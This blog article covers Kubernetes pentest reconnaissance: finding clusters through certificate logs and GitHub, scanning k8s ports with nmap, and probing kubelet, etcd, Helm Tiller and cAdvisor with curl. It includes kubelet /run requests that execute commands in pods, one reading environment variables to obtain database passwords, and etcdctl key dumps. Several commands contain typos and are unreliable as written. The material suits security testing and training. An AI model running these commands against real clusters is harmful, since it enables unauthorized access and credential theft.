Practical Kubernetes Pentest. Searching for Open Source Resources

The Kubernetes containerized application orchestration environment has seen widespread adoption in recent years. There are many reasons for this.

First of all, these are all the advantages that the use of containers provides: the ability to build a microservice architecture, when we can divide the application into separate components that work in containers and implement the functionality we need in them, regardless of other elements of our solution. Also, containers allow you to use equipment more efficiently, they are convenient to use where you need to deploy several identical instances of the application, for example, when migrating from a development environment to a testing environment.

Finally, containers allow you to make your application architecture more secure by isolating individual components. Then, if one microservice is compromised, an attacker won’t be able (or at least shouldn’t) to get out of the container and take over the containerization environment.

When the number of servers running containers increases to several dozen or more, there is a need to use a tool for centralized management of containerization nodes, and here Kubernetes comes to the rescue. With its help, you can deploy multiple instances of one application, automatically maintain the required number of them, ensure a transparent process for users to update the many microservices it consists of, differentiate access to different instances of containers, and much more.

Thus, it is quite clear that Kubernetes is essentially the basis for the entire infrastructure on which the application runs, and how securely it will operate largely depends on how correctly the orchestration environment itself is configured.

Of course, you can implement various security mechanisms, such as the role-based access model we discussed earlier, but you can only judge how well a system is protected by trying to follow the hacker's path, that is, trying to hack it. In real life, this task is usually performed by so-called “white hat hackers” – pentesters. In this article, we will try to look at Kubernetes security through the eyes of pentesters.

First, reconnaissance

Traditionally, attackers usually start searching for information from open sources. And Kubernetes is no exception. So, knowing which domains belong to a given organization and which cloud providers' services it uses, you can try to search for the necessary subdomains using queries like Identity LIKE “k8s.%.com” on specialized resources like crt.sh, where in addition to information about the certificates used, subdomains associated with Kubernetes will also be indicated.

Knowing the domains used will help the hacker understand which components of the service being attacked are running directly in the Kubernetes environment. Let's take, for example, a client-server application whose server part is hosted in the cloud. If the address of this part matches the address of the subdomain we found in the previous step, then this is a sure sign that the application is running in a containerization environment managed by Kubernetes.

Developers (as well as other IT professionals) are generally quite lazy and if someone has done at least part of the work for them, they will gladly take advantage of it. Therefore, if an attacker knows what services and components are used to run an application, he can try to search github for YAML files for these services.

Let's look at a small example. Let's say that due to incorrect web server configuration, we have access to the phpinfo.php file, from which we learned that the target application runs on Nginx and uses PHP7. Now we can go to github and, using requests like “k8s nginx php 7”, try to find a ready-made set of YAML files describing the creation and deployment of all the entities necessary for the operation of these services.

There won't be too many options, and not all results contain the necessary files, but if we're lucky and find the set of files that the developers used, we'll be able to at least find out: which components interact with each other (ports, services, protocols), and at most, perhaps there are vulnerabilities in the settings and/or in the software used that we can try to exploit.

Remember about ports

Another ancient, but still working method is scanning network ports. Of course, you shouldn't expect all of the ports listed below to be looking at the Internet, although Shodan may well find something open on the network. However, if we already have access to an internal network that is not very well segmented, then scanning ports may well bring results.

So, below is a list of ports with brief explanations. Of course, it is unlikely that all of these ports will be open, but during a pentest it is quite possible to encounter a situation where some of them may be open. In this case, it is important to understand what you can try to do on it.

The following ports are open for incoming connections on Kubernetes management components:

6443 (TCP) (Kubernetes API server), 2379-2380 (TCP) (etcd server client API kube-apiserver, etcd), 10250 (TCP) (Kubelet API Self, Control plane), 10259 (TCP) (kube-scheduler) , 10257 (TCP) (kube-controller-manager).

The following ports will be open on worker nodes:

10250 (TCP) (Kubelet API), 10256 (TCP) (kube-proxy, Load balancers), 30000-32767 (TCP) (NodePort Services).

There are also a number of auxiliary services designed to monitor the health of k8s components, so in the example below we will poll a few more ports. For example, we will check the insecure port 8080 just in case.

In order to quickly search the network for only open k8s ports and generally not create too much unnecessary noise in the traffic, we will scan the network using Nmap, specifying only the necessary ports

nmap -p 443,2379,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,44134
<pod_ipaddress>/16

If we managed to get a non-zero result as a result of port scanning, or, more simply put, find open ports, then we can try to see what is running on them using curl.

For the node shown in the figure, such checks will look like this:

curl -k https://192.168.49.2:8443/api/v1

So, we have done our reconnaissance and have been able to locate Kubernetes nodes. Now we need to try to find and exploit vulnerabilities in the configuration and components of the orchestration environment.

In this article, we will not consider the Kubernetes architecture in detail, as there are already enough publications devoted to this topic. So, we will immediately move on to searching for vulnerabilities in k8s components.

Kubelet API

The kubelet service runs on each cluster node. It manages pods within the node. The kubelet API interacts with the main kube-apiserver module. An important point is that by default, HTTP requests that are not authenticated but not rejected are treated as anonymous access and are considered system:anonymous users in the system:unauthenticated group. Accordingly, if you find that this service is open, you may be able to execute arbitrary code.

Let's try to find available resources using curl. For example, you can look at the metrics:

curl -k https://192.168.49.2:10250/metrics

Or working pods:

curl -k https://192.168.49.2:10250/pods

If we get “Unauthorized” in response, then we are out of luck and authentication is required. But if we get some JSON in response, then we can try to do something interesting.

To start, you can get a list of all pods running on a node:

curl -sk https://192.168.49.2:10250/runningpods/

Next, you can try to execute the necessary commands in the containers. So, having received a list of pods running on the node, we can find something interesting, for example, a DBMS. Let's try to read the contents of the directory:

$ curl -k -XPOST "https://192.168.49.2:10250/run/default/mysql-epg0f/mysql" -d
"cmd=ls -la /"

The password for the DBMS can be found using OS environment variables:

$ curl -k -XPOST "curl -sk 

https://192.168.49.2:10250/run/default/mysql-epg0f/mysql" -d 'cmd=env'

Code reviewers may find the Kubelet source code interesting, and can be found at:

curl -s https://raw.githubusercontent.com/kubernetes/kubernetes/master/pkg/kubelet/server/server.go 

So, we have outlined the main attack vector. However, what to do if we have dozens of nodes and hundreds of different pods? In this case, we can resort to a small script that will allow us to compose curl requests based on data obtained using kubectl:

kubectl get nodes -o custom-columns="IP:.status.addresses[0].address,KUBELET_PORT:.status.daemonEndpoints.kubeletEndpoint.Port" | grep -v KUBELET_PORT | 
while IFS='' read -r node; do
    hst=$(echo $node | awk '{print $1}')
    prt=$(echo $node | awk '{print $2}')
    echo "curl -k --max-time 30 https://$hst:$prt/pods"
done

As you can see, here we use kubectl to form a request to connect to the kubelet API.

Etcd API

Let's remember that the etcd component is a database for Kubernetes, which is a critical element of any cluster. It stores all the information needed for its stable operation and, accordingly, it will not be very good if an attacker gains access to it.

If you have access to port 2379, you can also access the etcd database using curl:

url -k https://192.168.49.2:10250/version

etcdctl --endpoints=https://192.168.49.2:2379 get / --prefix --keys-only

To automate the etcd search, you can slightly modify the example from the previous section to access port 2379:

kubectl get nodes -o custom-columns="IP:.status.addresses[0].address,KUBELET_PORT:.status.daemonEndpoints.kubeletEndpoint.Port" | grep -v KUBELET_PORT | 
while IFS='' read -r node; do
    hst=$(echo $node | awk '{print $1}')
    echo "curl -k --max-time 30 https://$hst:2379/version" 
done

This way we can discover nodes with etcd service available.

Helm and others

So far we've talked about discovering and using components of k8s itself. Now let's look at discovering and using an interesting additional element called the Helm service.

Helm is a popular package manager for K8s that greatly simplifies the process of installing, managing and scaling applications in a cluster. Helm uses the Tiller service, which lives on port 44134 (TCP). Accordingly, if we were able to find an open port, we can try to access it using the helm client. In the example below, we find out the Helm version:

helm –host 192.168.49.2:44134 version

Another interesting service is cAdvisor. It is an open source tool designed to monitor the health of containers. It is used to read the performance characteristics and resource usage of containers running in a cluster. This service runs on port 4194 TCP and the open port can be accessed using curl:

curl -k https://192.168.49.2:4194

NodePort Service

We already mentioned the NodePort service when we talked about ports opened on the cluster worker nodes. Through NodePort, the same port is opened on all nodes that transmit traffic to the service. By default, this port will be in the range 30000–32767. Thus, new unverified services can be accessed through these ports.

You can search for these services separately using nmap:

sudo nmap -sS -p 30000-32767 192.168.49.2

Let's sum it up

In this article, we haven't hacked anything yet, as our main goal was to first identify the Kubernetes components themselves and their placement on the network, and then try to identify services on open ports for subsequent attack development. In the next article, we'll look at some methods of exploiting vulnerabilities in k8s settings and its components.

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *